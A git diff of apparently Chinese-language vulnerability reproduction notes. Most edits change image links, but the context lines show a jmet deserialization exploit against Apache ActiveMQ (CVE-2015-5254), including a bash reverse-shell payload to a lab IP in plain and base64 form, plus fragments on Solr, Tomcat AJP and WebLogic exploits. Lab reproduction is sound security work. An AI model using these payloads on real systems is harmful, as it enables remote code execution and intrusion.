diff --git a/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md b/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md index 95044dc..4386542 100644 --- a/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md +++ b/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md @@ -51,11 +51,11 @@ sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjd sudo update-alternatives --config java ``` -![image-20220221132209838](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350253.png) +![image-20220221132209838](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347913.png) 再次查看java版本,切换成功 -![image-20220221132246597](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350254.png) +![image-20220221132246597](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347914.png) ### 漏洞复现 @@ -72,17 +72,17 @@ mkdir external java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc" -Yp ROME 192.168.174.128 61616 ``` -![image-20220221133654012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350255.png) +![image-20220221133654012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347915.png) 访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列,ID为kali-38087-1645421794512-1:1:1:1:1 -![image-20220221133733242](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350256.png) +![image-20220221133733242](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347916.png) 点击这个信息触发文件创建,成功执行命令 touch /tmp/awesome_poc -![image-20220221133952983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350257.png) +![image-20220221133952983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347917.png) -![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350258.png)也可以创建一个反弹shell的payload +![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347918.png)也可以创建一个反弹shell的payload ```shell bash -i >& /dev/tcp/192.168.174.128/9999 0>&1 (base64编码) @@ -94,13 +94,13 @@ bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{bas java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.174.128 61616 ``` -![image-20220221134243490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350259.png) +![image-20220221134243490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347919.png) 查看消息队列,ID为kali-38435-1645422155171-1:1:1:1:1 -![image-20220221134313545](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350260.png) +![image-20220221134313545](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347920.png) 监听9999端口,点击消息队列会触发命令执行,反弹Shell -![image-20220221134508900](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211350261.png) +![image-20220221134508900](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211347921.png) diff --git a/Web服务器漏洞/Apache Solr Velocity模板远程执行 CVE-2019-17558.md b/Web服务器漏洞/Apache Solr Velocity模板远程执行 CVE-2019-17558.md index bd35f95..0c05c38 100644 --- a/Web服务器漏洞/Apache Solr Velocity模板远程执行 CVE-2019-17558.md +++ b/Web服务器漏洞/Apache Solr Velocity模板远程执行 CVE-2019-17558.md @@ -38,7 +38,7 @@ docker-compose exec solr bash bin/solr create_core -c test -d example/example-DI -访问Core的config配置信息时,通过POST请求把`{% em type="red" %}params.resource.loader.enabled{% end em %}`设置为 True,再通过精心构造的get请求即可RCE,此时用户就可以加载指定资源,构造一个能执行命令的恶意请求 +访问Core的config配置信息时,通过POST请求把{% em type="red" %}params.resource.loader.enabled{% endem %}设置为 True,再通过精心构造的get请求即可RCE,此时用户就可以加载指定资源,构造一个能执行命令的恶意请求 **设置params.resource.loader.enabled为True** diff --git a/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md b/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md index 052c3ab..ce82c43 100644 --- a/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md +++ b/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md @@ -363,4 +363,5 @@ print("".join([d.data for d in data])) [Github地址](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py) -[威胁通告 APACHE TOMCAT 文件包含漏洞(CVE-2020-1938)](http://blog.nsfocus.net/cve-2020-1938/) \ No newline at end of file +[威胁通告 APACHE TOMCAT 文件包含漏洞(CVE-2020-1938)](http://blog.nsfocus.net/cve-2020-1938/) + diff --git a/Web服务器漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md b/Web服务器漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md index b4b73af..d46ff6a 100644 --- a/Web服务器漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md +++ b/Web服务器漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md @@ -175,4 +175,5 @@ if __name__ == '__main__': POC_1(target_url, IP, PORT) ``` -![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225540.png) \ No newline at end of file +![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091225540.png) +